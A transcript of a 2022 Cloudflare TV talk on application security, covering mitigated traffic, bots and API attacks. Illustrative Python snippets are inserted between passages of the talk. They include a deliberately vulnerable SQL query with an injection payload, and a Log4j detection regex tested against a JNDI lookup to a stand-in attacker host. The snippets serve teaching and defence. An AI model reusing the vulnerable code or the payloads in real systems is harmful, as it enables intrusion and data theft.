🔒 Security Week Product Discussion: A Cloudflare View on Application Security

Presented by: Michael Tremante, David Belson

Originally aired on March 22, 2022 @ 9:30 AM - 10:00 AM EDT

Join Cloudflare's Product Management team to learn more about the products announced today during Security Week.

Tune in daily for more Security Week at Cloudflare!

Transcript

Good morning and welcome to Cloudflare TV. We're here this morning to talk about Cloudflare's view on application security, and we're going to build on the reports that our security team has been publishing for the last few years. I'm David Belson, and I'm excited to be joined this morning by my colleague Michael Tremante. Michael, why don't you introduce yourself?

Sure. Hello, everyone. Nice to see you all again. Some of you may recognize me from some of the other sessions I've been doing this week. I'm a product manager at Cloudflare. I've been here for quite some time, but more recently I've been focusing on application security. So I'm really excited to be with you today, David, talking about one of the recent reports we published.

Excellent. Thank you. So before we start, I just want to remind everybody that you can ask us questions by emailing livestudio@cloudflare.tv. We will try to answer what we can live, and if not, we will follow up afterwards. All right, Michael. So before we jump in, I want to set the scene a little bit. Can you describe what application security is at a high level?

Yeah, sure. So of course, it's a massive topic, right? If you have anything connected to the Internet that is potentially public facing, all the way from a blog, a standard website, or a marketing initiative, to larger businesses that may have e-commerce applications, all the way to large enterprises, those assets are now commonly used. Especially now with the pandemic, there's been an increase in online activity across the board. And unfortunately, not everyone on the Internet is a good actor. There's a lot of malicious activity out there. And when we talk about application security, we're mostly referring to all of those processes, software, tools, and technologies that can help you make sure that your app is safe.
And, more importantly, that your end user data, which you're likely storing on your app, doesn't get compromised and used for nefarious purposes somewhere else. And of course, a big chunk of what Cloudflare does, and where we've started looking at the data together, is around application security. I just want to give a few examples. Of course, the big one, going all the way back to the first days when Cloudflare became popular, is DDoS mitigation. For those who don't know, DDoS stands for Distributed Denial of Service, and it's a bit of a blunt tool that some attackers will try to use to take down an application by overloading the app itself. Sometimes this is done by pure number of requests. If an attacker has a way to gain control of a botnet, they may have, I don't know, 15,000 compromised IoT devices at their disposal. And if they have a grudge against something or someone, they may literally brute force their way to taking down that app. That's just one example.

A couple of others. Of course, DDoS mitigation is somewhat easy if you have a large network like Cloudflare does. But more sophisticated attacks will be done by hackers, potentially even manually, to try to look for explicit exploits or vulnerabilities in the app. Before I joined Cloudflare, I used to be a pen tester. I'm not good by any means, but I have a little bit of experience recognizing what is good or bad. And that is where something like a web application firewall comes into play. So say there's a form on your website, a sign-up form. If by any chance the development of that form wasn't done with security in mind, that form might be vulnerable to receiving, let's say, scripts or SQL code.
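As an illustration of the form scenario just described, the following is a minimal sketch of how SQL arriving through a form field can change a query. It is not taken from the talk: the table, the helper names (`build_demo_db`, `lookup_unsafe`, `lookup_safe`) and the payload are all hypothetical, and it uses Python's built-in `sqlite3` module purely for demonstration.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Create a throwaway in-memory database with two example users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com")],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, name: str) -> list:
    # Vulnerable: the form value is pasted straight into the SQL text,
    # so quotes inside it can rewrite the query.
    query = "SELECT email FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    # Parameterized: the value is bound as data and never parsed as SQL.
    query = "SELECT email FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(query, (name,))]


# Hypothetical malicious form input.
PAYLOAD = "nobody' OR '1'='1"

if __name__ == "__main__":
    db = build_demo_db()
    print("unsafe:", lookup_unsafe(db, PAYLOAD))  # leaks every stored email
    print("safe:  ", lookup_safe(db, PAYLOAD))    # matches no user
```

A web application firewall sits in front of code like `lookup_unsafe` and tries to stop the payload before it arrives; binding parameters as in `lookup_safe` removes the flaw at the source.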
SQL is a common programming language for backend database systems, and by adding specific payloads, the attacker may actually be able to infiltrate the backend server and take control of it. That's the worst case scenario. Or, still pretty bad, they might be able to exfiltrate data directly from the form itself, in which case your user data is out there on the web. Of course, these are two examples. There's a lot more that goes into application security, and some technologies are a lot more sophisticated than just looking at payloads. To give one such example, at Cloudflare we provide an IP threat reputation database, which isn't necessarily making a decision on blocking traffic based on the payload itself. Instead, given an IP address (and I know that IPs are no longer the best signal for malicious traffic), it's based on what the behavior of that client has been, potentially across the whole network. If we're constantly observing bad behavior or very fast automated traffic, that may indicate that the IP is a compromised device or similar. Customers may be able to use signals such as these, again, to protect their apps, all in the scope of application security. Then there's the other part, of course: everything that security analysts can do on top of all of this data, constantly locking down, reviewing compromises, forensics, incident analysis. The scope here is pretty large. So it's a nice combination of what we're able to automate and what we can tune manually.

And for the purposes of what we're talking about today, are we looking at just web traffic, or are we looking at all the Internet traffic that we see at Cloudflare?

Yeah. So when we refer to app security in the context of today, and of the blog post and the report we published recently, we're narrowing the spectrum of things we could look at to HTTP, Layer 7 traffic only.
That's to some extent where more interesting things happen. As I said, something like a DDoS attack could be just a brute-force volume thing, but because we're a Layer 7 proxy, we understand the HTTP protocol, which is the core component of how the World Wide Web portion of the Internet works. So if we drill down into that, there are some very interesting insights. And today, whenever we refer to traffic, we're talking about both HTTP and, of course, HTTPS traffic passing through our network.

Cool. Thank you. So given the broad portfolio of application security services that Cloudflare has, what makes us unique in this space?

Yeah. And this is what actually made us excited about publishing some of this data, right? It took us a while to get to where Cloudflare is, but as of today we're proxying and protecting, I would say, more than 20 million applications on the web. And we have built this network, which is comprised of edge locations. In fact, just the other day we published a number of additional cities where we deployed our points of presence. And the cool thing here is that this has given us visibility into a tremendous amount of traffic. So on average, Cloudflare is now proxying, again at Layer 7, 32 million requests per second. There are large applications out there, but as numbers go, that's a pretty big number, right? And that number gets even bigger at peak. There's some seasonality for some customers. The typical example would be something like Black Friday, where a lot of our e-commerce customers have massive marketing events, and at peak that number goes all the way up to 44 million requests per second. I'm sure we'll have to revisit those numbers next year, as they'll be even bigger. And what this gives us is visibility into identifying trends, right? And not only regional trends, but global trends.
What sort of attacks are we observing across the network? And for our own customers' benefit, a lot of this intelligence is going back into the products themselves, right? So when we spot a new attack vector, we might update our managed rules. When a customer gets attacked by a DDoS vector that's not mitigated out of the box, which is not common but happens, our teams will update our DDoS mitigation rules and deploy updates to everyone. And that's really, I think, where the power of the Cloudflare network now lies: in the intelligence that we gain from the shared community aspect of being on top of the network, which was a core fundamental when Cloudflare got founded, right? Bringing those tools that only the large companies could afford down to everyone who has something to publish on the World Wide Web.

Right. Democratizing the access to security capabilities.

Absolutely.

All right. So with the 20 million applications that we protect and the 32 to 44 million requests per second that we see, in the blog post we published yesterday, we said that about 8% of the HTTP traffic that we see is mitigated. Can you explain what mitigated traffic is?

Yeah, absolutely. I think whenever we publish these things, it's important to define what we're talking about, because a lot of it is about interpreting the data correctly. That 8% is equal to about 2.5 million requests per second mitigated, which is still a very large number if you think about it in that way. We thought quite a bit about what the right definition of mitigated was here, and it boils down to any HTTP requests that, either by automated means from our managed security products, for example the WAF, the DDoS mitigations, etc., or potentially even by our customers' own configurations, are receiving what I would call a terminating action from the edge. Saying that these are things that are being blocked is not comprehensive enough.
But if a request was blocked or if it was challenged, and let me go into some detail on what those things mean, if there was an action that meant the request was not proxied all the way to the origin, then this counts as a mitigated request. So there's something in that request that was deemed malicious by one of our products or by someone on our customer's side, and therefore it adds to the count. Blocking, of course, is the easy one to understand. If a request has a malicious payload, as I said earlier, like an injection attempt or a cross-site scripting attempt, and it matches a managed rule, it's very easy for the WAF to be configured in blocking mode. That's actually the way you should configure a WAF, so that the request doesn't get through to your origin. The client will receive a 403 response code and is unable to proceed further. Within the Cloudflare dashboard, though, we do have other actions that definitely count as mitigated. To give you two examples, one of them is a JavaScript challenge. This is very effective at blocking bots that are not full-blown headless browsers. If I were to write a script because I want to crawl someone's website and download data, and let's say that someone doesn't want me to do that, issuing a JavaScript challenge to crawlers is a very easy way to force me to increase my efforts if I want to keep crawling, because the bot, the crawler, will not parse the JavaScript, will not execute it, and will not be able to solve the challenge. And therefore all my requests will be blocked.

Whereas if I was browsing from my Chrome or my Firefox, my browser would be able to say, okay, I can do that computation and send back the result. And then we would say, okay, great, go ahead.

Yeah, exactly. And the nice thing about the JavaScript challenge and similar mitigation actions is that browsers will do this instantly and there's negligible end user impact, right?
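The definition of "mitigated" given above can be sketched in a few lines. This is only an illustration under stated assumptions: the action labels (`block`, `js_challenge`, `captcha_challenge`, `allow`) and the function names are hypothetical, not Cloudflare's actual identifiers. The last helper reproduces the arithmetic behind the figures quoted in the conversation (8% of an average 32 million requests per second).

```python
# Hypothetical labels for "terminating actions", i.e. outcomes where the
# request is not proxied to the origin. Real product names may differ.
TERMINATING_ACTIONS = frozenset({"block", "js_challenge", "captcha_challenge"})


def is_mitigated(action: str) -> bool:
    """A request counts as mitigated if it received a terminating action."""
    return action in TERMINATING_ACTIONS


def mitigated_share(actions) -> float:
    """Fraction of requests in a sample that were mitigated."""
    actions = list(actions)
    if not actions:
        return 0.0
    return sum(1 for a in actions if is_mitigated(a)) / len(actions)


def mitigated_rps(total_rps: float, share: float) -> float:
    """Mitigated requests per second implied by a traffic rate and a share."""
    return total_rps * share


if __name__ == "__main__":
    # Made-up sample: 92 allowed requests and 8 with terminating actions.
    sample = ["allow"] * 92 + ["block"] * 5 + ["js_challenge"] * 2 + ["captcha_challenge"]
    print(f"mitigated share: {mitigated_share(sample):.0%}")
    # Figures quoted in the talk: 8% of an average 32 million requests/second.
    print(f"mitigated rps:   {mitigated_rps(32_000_000, 0.08):,.0f}")
```

With the quoted figures the last line works out to roughly 2.56 million requests per second, which matches the "about 2.5 million" mentioned in the conversation.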
So if you are browsing a site and you receive a JavaScript challenge for whatever reason, chances are you will not even notice. It happens behind the scenes.

Cool. Okay. So given that we're seeing these tens of millions of requests a second, how do we know that any given request needs to be mitigated? What about a given request will raise a red flag in our system, kicking off these mitigation actions?

Yeah. So it's interesting to look at the managed mitigations first. I think that's where a lot of the value Cloudflare has comes into play in security, especially with products like our WAF. Those of you who are using the Cloudflare WAF will be familiar with our managed ruleset, for example. These are highly sophisticated rules that we have built internally on our security team. We have a security analyst team that is essentially constantly working on them, and once deployed, the rules are constantly inspecting every single request. They tend to be regular expressions, for those who know what a regular expression is. But essentially we're looking for characters, or combinations of characters, or certain patterns, right, code snippets that normally should not be in the request. And whenever there's a match, that would cause a block. In fact, in the default deployment of our managed ruleset, so if you're in the dashboard and you deploy it without customizing the configuration, several hundred of these rules default to block out of the box, because we're very confident in what we're looking for. The recent Log4j vulnerability is the perfect example of that, right? The team built the rules. We used our own data, like we're doing here, to define what the payload was. And then we deployed that on behalf of customers. And of course, the WAF is Layer 7. DDoS mitigation is also a feature that acts at Layer 7 as well. A lot of it is blocked at Layer 3/4.
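To make the idea of a regular-expression rule concrete, here is a toy sketch of a pattern that looks for the `${jndi:` lookup string associated with the Log4j vulnerability mentioned above. It is emphatically not Cloudflare's managed rule: the pattern, the `evaluate` function and the field names are assumptions made for illustration, and real rules have to cope with many obfuscated variants that this one ignores.

```python
import re

# Toy pattern: flags the "${jndi:" lookup prefix, case-insensitively.
# Real-world rules are far more thorough; this one misses obfuscated forms.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def evaluate(request_fields: dict) -> str:
    """Return 'block' if any inspected field matches the pattern, else 'allow'.

    `request_fields` is a hypothetical mapping of field name to string value,
    for example selected headers, the URI, or the body.
    """
    for value in request_fields.values():
        if JNDI_LOOKUP.search(value):
            return "block"
    return "allow"


if __name__ == "__main__":
    suspicious = {
        "user-agent": "${jndi:ldap://attacker.example/a}",
        "uri": "/",
    }
    ordinary = {"user-agent": "Mozilla/5.0", "uri": "/products?id=42"}
    print(evaluate(suspicious))
    print(evaluate(ordinary))
```

The point of the sketch is the shape of the mechanism: a pattern that should never appear in legitimate traffic, checked against every request, with a match leading to a terminating action.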
So those are volumetric requests that don't do HTTP. But at Layer 7, for DDoS, we have some very sophisticated threshold analysis constantly ongoing on all of our edge PoPs. So say you have an e-commerce site and your average request rate or request threshold is X, and all of a sudden that becomes 15X in a very short period of time, like there's a burst of traffic. That would trigger our DDoS mitigations at Layer 7. So even if the requests themselves are not necessarily malicious individually, the pattern of them makes them malicious. And that's another case where managed mitigation comes into play.

And in that case, for example, it could be a DDoS attack, or it could be that some new sneakers just went on sale. I assume customers have the ability to say, okay, in this case we want to mitigate, and in this case maybe we want to put them in a waiting room or something.

Yeah. Good question. False positives are always a problem in security. Many vendors will say they've solved false positives. I would love to speak to them. Have they? But yes, in some cases that happens. And that's why we're always fine-tuning our mitigations, as well as offering ways for customers to configure our managed mitigations so that, for a specific event they're expecting, they can lift the threshold up or customize that a little more. But even more importantly, talking about mitigated events, customers can write their own filters defining what they want to block or not. That is something that we offer as part of the WAF, for example. And if a customer has defined a specific filter and they decide to block that traffic, that also contributes towards the stat we mentioned earlier about mitigated events.

Right. And so if customers are doing that, what are the criteria that they're using to mitigate on? What are they looking for?

Yeah, a good question.
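The traffic-burst example from earlier in this exchange (a baseline of X that suddenly becomes 15X) can be sketched as a simple rolling-baseline check. This is a deliberately naive illustration, not a description of how Cloudflare's Layer 7 DDoS detection works: the `BurstDetector` class, its window size and the fixed multiplier of 15 (borrowed from the speaker's example) are all assumptions.

```python
from collections import deque
from statistics import mean


class BurstDetector:
    """Flag a sample that exceeds a multiple of the recent average rate."""

    def __init__(self, window: int = 60, multiplier: float = 15.0):
        self.history = deque(maxlen=window)  # recent per-second request counts
        self.multiplier = multiplier

    def observe(self, requests_this_second: int) -> bool:
        """Record one sample; return True if it looks like a burst."""
        burst = False
        # Only judge once a full window of baseline data is available.
        if len(self.history) == self.history.maxlen:
            baseline = mean(self.history)
            burst = baseline > 0 and requests_this_second >= self.multiplier * baseline
        # Keep burst samples out of the baseline so an attack cannot
        # gradually raise the threshold.
        if not burst:
            self.history.append(requests_this_second)
        return burst


if __name__ == "__main__":
    detector = BurstDetector(window=5)
    for rate in [100, 100, 100, 100, 100, 2000, 110]:
        print(rate, detector.observe(rate))
```

As the conversation notes, a check like this cannot tell an attack from a product launch on its own, which is why thresholds need to be adjustable for expected events.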
We were very curious to look into that as well. We've done it a couple of times in the past, and this time we spent a bit more time exploring. First of all, to give some weight to this insight, we have 6.5 million, more or less, actively deployed custom rules running at the edge. So it's a pretty big number. It's a pretty big dataset. The number one feature or filter customers seem to be using is still IPs or IP-related fields: the country, the network number, as in the autonomous system the IP is part of, or any other immediately deducible fields. Which is interesting. I believe, personally, it's the easy thing to do. If you're under attack and something is not being mitigated by Cloudflare out of the box, the first thing people look at is what IP is causing the problem. Having said that, of course, there are growing concerns about using IP addresses as a signal for malicious traffic. Things like proxies, forward proxies, VPNs, even Apple's Private Relay, which has been mentioned a couple of times, are making IPs not a good way to block traffic. The other thing I'll add there, on the good side, is that IPs are very often combined with other filters. On average, our rules have three or more filters or fields used in combination, so it's not just an IP block. Customers tend to be using HTTP paths, request headers, or other signals in the request to make sure they're blocking the right things on the right applications. We do offer, as part of Cloudflare, more sophisticated, intelligent fields, going back to what I was saying earlier, and a non-negligible percentage of rules are making use of these fields. The two that top the list are definitely the bot score, which is part of our bot management product, where we allow customers to set their own thresholds on what is a bot and what is not.
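The point about combining an IP-derived field with other signals can be sketched as a rule with three conditions. Everything here is hypothetical: the `Request` type, the ASN (taken from the private-use range), the path prefix and the score threshold are invented for illustration, and the sketch assumes a bot score where lower values mean "more likely automated". It is written in plain Python rather than in any real rule language.

```python
from dataclasses import dataclass


@dataclass
class Request:
    asn: int        # autonomous system number the client IP belongs to
    path: str       # HTTP request path
    bot_score: int  # assumed scale: lower means more likely automated


# Hypothetical values chosen for the example only.
SUSPECT_ASNS = {64512}        # a private-use ASN standing in for a noisy network
PROTECTED_PREFIX = "/login"   # the part of the application being protected
BOT_SCORE_THRESHOLD = 30      # customer-chosen cutoff


def should_block(req: Request) -> bool:
    """Block only when all three signals agree, not on the network alone."""
    return (
        req.asn in SUSPECT_ASNS
        and req.path.startswith(PROTECTED_PREFIX)
        and req.bot_score < BOT_SCORE_THRESHOLD
    )


if __name__ == "__main__":
    print(should_block(Request(asn=64512, path="/login", bot_score=5)))
    print(should_block(Request(asn=64512, path="/blog", bot_score=5)))
    print(should_block(Request(asn=64512, path="/login", bot_score=90)))
```

Requiring the path and the score to match as well means that a legitimate visitor who happens to share a network with an attacker is much less likely to be blocked.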
And then the IP threat reputation score, which is what I mentioned earlier. It's based on what we observe as behavior across the network, and then we assign a score: okay, this request is potentially malicious, not because it is malicious in itself, but because the client has been doing other malicious things across the network.

Right. That makes sense. So using IP addresses or IP address-derived mitigations is sort of blunt force, but using them in combination with other pieces of insight, other pieces of data, helps you do a little more surgical blocking. So we're talking about malicious traffic and mitigating malicious traffic. I've seen a lot in the press that bots are also frequently talked about when malicious traffic is being discussed. Can you give the ten-second overview of what a bot is? And then can you touch on whether all bots are bad, or whether there are some kinds of good bots? How does that landscape play out?

Yeah, we published some stats around this in the past, and we've updated them as part of the report. First, what is a bot? If something generating an HTTP request is not a human using a browser, it's loosely defined as a bot. There's a vast amount of ambiguity in that definition. Of course, depending on who you ask, they'll give you slightly different answers, which is part of why solving bot management is actually quite hard. But generally speaking, if it's not a human using a browser, it's a bot. We refreshed our data, and at the time of writing we observed that 38% of all HTTP traffic is coming from automated devices, or from bots, which is a substantial amount across all the global traffic we observe. And absolutely right, not all bots are bad, so just because it's a bot doesn't mean you should block it. For this reason we've actually implemented quite a few features on top of our bot management product to let you define more easily what is good versus bad. One obvious one is our verified bots list.
These are things like the Google crawler, Bing, and other tools out there that are doing scans for legitimate reasons. The list of verified bots is quite large, well over 100. And if you haven't seen this, by the way, please head over to Cloudflare Radar, which, David, I think you may have also worked on. We're now publishing our verified bots list there. It's not the full set just yet, but it already includes quite a lot of the verified bots, so you can check what is included in that list. More recently, to make this easier, we've also launched a friendly bots list, which was part of Security Week. So if something is not verified but you think it's good or acceptable for your environment, you can flag it as such. And then in the background we will be constantly checking what the more popular bots are that customers are flagging as acceptable, also as a way to improve our verified bots list.

The verified bots list, I believe, is on the homepage at Cloudflare. So those verified bots, those good bots like search engines and the like, are the ones we wouldn't want to block traffic from. How much of the automated traffic we see is from bad bots, and what are our customers doing about that traffic?

Right. So a little less than a third is non-verified, about 31% if I remember correctly. These are all things that we don't recognize as a popular service that we'd advise allowing by default. Again, that doesn't necessarily mean all of this traffic is bad, but it's definitely good for anyone using Cloudflare Bot Management to review it and see what's going on, to make a more thoughtful decision. And when we look at the non-verified traffic, nearly 40% of it is actually blocked by our customers. I want to reiterate that's an active decision that our customers make. We're just providing the metadata to make that decision.
And of course, by blocked we're talking about mitigated events, but quite a good chunk of those mitigated events are actual blocks, so not JavaScript challenges or CAPTCHA challenges or similar. So that gives quite good confidence that most of the non-verified bot traffic, at least from our perspective, is unwanted. Very often these are crawlers or vulnerability scanners. Anyone can download something from the Internet now and do a scan on a website looking for vulnerabilities, and those things would be flagged as non-verified bots. The other really quick thing I'll mention here: looking at the non-verified bot traffic, we actually see a non-negligible percentage of it being blocked by our DDoS mitigation, which kicks in before customer mitigations. That's a good validation for us, because it's telling us that a lot of these non-verified bots are actually compromised devices that are part of IoT botnets. So it's working as expected.

Poorly behaved. All right. So in the last 5 minutes that we've got, I also wanted to continue that conversation on automated traffic and talk about APIs a little bit. APIs obviously now enable a lot of the computer-to-computer communications that happen with IoT and our connected devices and the like. Our colleague Daniel published a blog post back in January that, as I remember, said API traffic is now over half of the requests on the Cloudflare network. What does the attack landscape look like for API traffic?

Yeah. And before we dive into that, it's also interesting to note what we are defining as API traffic.

Yeah.

Yeah, it's a little easier than bots. So when we say that 50-plus percent of traffic is API, normally you recognize API traffic by looking at what the response content type is. If it's something like JSON or XML format, it's obviously not intended to be consumed by a human using a browser.
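The content-type heuristic just described can be sketched as follows. This is an assumption-laden illustration rather than the classification Cloudflare actually runs: the set of media types and the function names are hypothetical, and the only input is the value of the response's `Content-Type` header.

```python
# Hypothetical set of media types treated as "API" responses in this sketch.
API_MEDIA_TYPES = {"application/json", "application/xml", "text/xml"}


def media_type(content_type_header: str) -> str:
    """Strip parameters such as '; charset=utf-8' and normalize case."""
    return content_type_header.split(";", 1)[0].strip().lower()


def is_api_response(content_type_header: str) -> bool:
    """Classify a response as API traffic based on its Content-Type header."""
    mt = media_type(content_type_header)
    # Structured-syntax suffixes such as application/problem+json also count.
    return mt in API_MEDIA_TYPES or mt.endswith("+json")


if __name__ == "__main__":
    for header in [
        "application/json; charset=utf-8",
        "text/html; charset=utf-8",
        "application/problem+json",
    ]:
        print(header, "->", is_api_response(header))
```

A heuristic like this depends on there being a response to inspect, so it only applies to requests that actually reached the origin.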
So we classify that as API. Now, looking at mitigated traffic, it's very important to define that a little more, because if a request is mitigated, we don't actually get the response from a server. So we cannot rely on the response type to define this as API traffic. What we did is look at the Accept header from the browser, since the browser can also say, I want a JSON response, or I want an XML response. We correlated that with the endpoints where we see those responses being issued, and there was a pretty good correlation between the two. It's not 100% bulletproof, but if we look at those requests and then we apply the mitigated definition we talked about earlier, so anything like a block, a challenge or similar, we actually find that 10% of all API requests are mitigated, which is higher compared to our global traffic trends. And that, to your point, makes me think that API endpoints are becoming more of a target for attackers compared to standard web applications.

Where the high-value information is hiding. So for those attacks that are targeting the APIs, is there anything specific we see in the attack patterns that, for example, our WAF blocks?

Yeah. So this is actually something that surprised me the most. For global traffic trends, if we look at managed rules, HTTP anomalies top the list as the most common attempted exploit. Things like missing HTTP headers, bad characters somewhere in the request, incorrect UTF-8 encoding, little things that web servers may not parse properly. Those by far top the list. If we look at API traffic, it's more specific, and actually SQL injection tops the list, which makes sense given a lot of these API calls will be relying on database queries, right? And it really goes to show that attackers are focusing their efforts on API endpoints. Injection is just one example. The other two attack vectors that caught my eye.
Command injections are a lot more frequent on API endpoints, and I think that's again really showing how attacks on API endpoints are focused. And the other one that surprised me is deserialization attacks, which really come into play with some specific backend frameworks where the API request is expecting a specifically crafted object that might be converted into an equivalent object in the backend programming environment. If there are ways you can trick that, you can make your backend server do arbitrary things. And this is commonly attempted on API endpoints. The last thing I'll say there as well: we're expecting our positive security model with API Shield to slowly start creeping up in terms of mitigation events as customers adopt API Shield. With that we'll lose some visibility into what attacks are being performed, because if a request doesn't conform to the API, we just block it outright. But positive models are a very, very good way of locking down API endpoints.

And API Shield, I assume, works in conjunction with the API Gateway that we announced earlier this week.

So API Shield is the security portion of the gateway, and all of our products work really well together, which is part of the value of Cloudflare, of course.

Cool. All right. Well, thank you. With that, we'll take this opportunity to close out this first look at Cloudflare's view on application security. We look forward to sharing more of those insights in the future. So thank you again, Michael, for joining me today. I don't know if you have any more Cloudflare TV Security Week plans, or is this the last one?

Last one on Cloudflare TV for Security Week. I'm sure I'll see the audience again in the near future.

Excellent. So now you can actually go take a nap.

It's fantastic.

And rest. Fantastic. All right. Well, thank you, everybody, for joining us. And we will see you again very soon.

Security Week

Security Week is one of Cloudflare's flagship Innovation Weeks, and features an array of new products and announcements related to bolstering the security of — and ultimately helping build — a better Internet. Tune in all week for deep dives on each...